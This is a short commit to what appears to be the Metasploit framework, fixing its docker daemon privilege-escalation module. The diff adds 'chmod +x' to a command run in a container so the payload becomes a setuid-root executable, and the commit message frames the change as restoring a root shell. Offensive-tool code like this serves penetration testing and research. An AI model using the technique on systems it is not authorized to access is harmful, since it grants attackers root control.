Fix permissions in docker priv_esc module

The previous command didn't give the original user enough permissions to execute the payload. This was resulting in permission denied and preventing me from getting a root shell. Fixes #8937
2017-09-07 16:48:02 -05:00 · 2017-09-07 16:48:02 -05:00 · 7e9d0b3e9b
parent c67e407c9c
commit 7e9d0b3e9b
1 changed files with 1 additions and 1 deletions
--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Local

    %Q{
      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
-      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
+      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
      docker rmi -f $IMG
      #{exploit_path}